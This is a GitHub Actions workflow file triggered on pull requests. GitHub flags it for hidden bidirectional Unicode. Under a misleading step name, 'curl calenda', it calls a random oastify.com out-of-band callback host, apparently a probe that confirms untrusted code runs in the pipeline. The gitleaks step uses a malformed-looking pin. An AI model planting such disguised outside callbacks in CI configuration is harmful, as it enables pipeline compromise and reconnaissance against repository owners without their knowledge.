.github/workflows/azione.yaml #29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
on: | |
- workflow_dispatch | |
- pull_request | |
jobs: | |
build: | |
runs-on: ubuntu-latest | |
name: Calenda | |
steps: | |
- name: curl calenda | |
run: curl qc66k98p4lhtnzgkq562em5s5jbaz1nq.oastify.com | |
- name: Gitleaks scan | |
id: run-gitleaks | |
uses: gitleaks/gitleaks-action@sha256:2ec8b9f617b48c888d0653fb5925820e0de9c674 |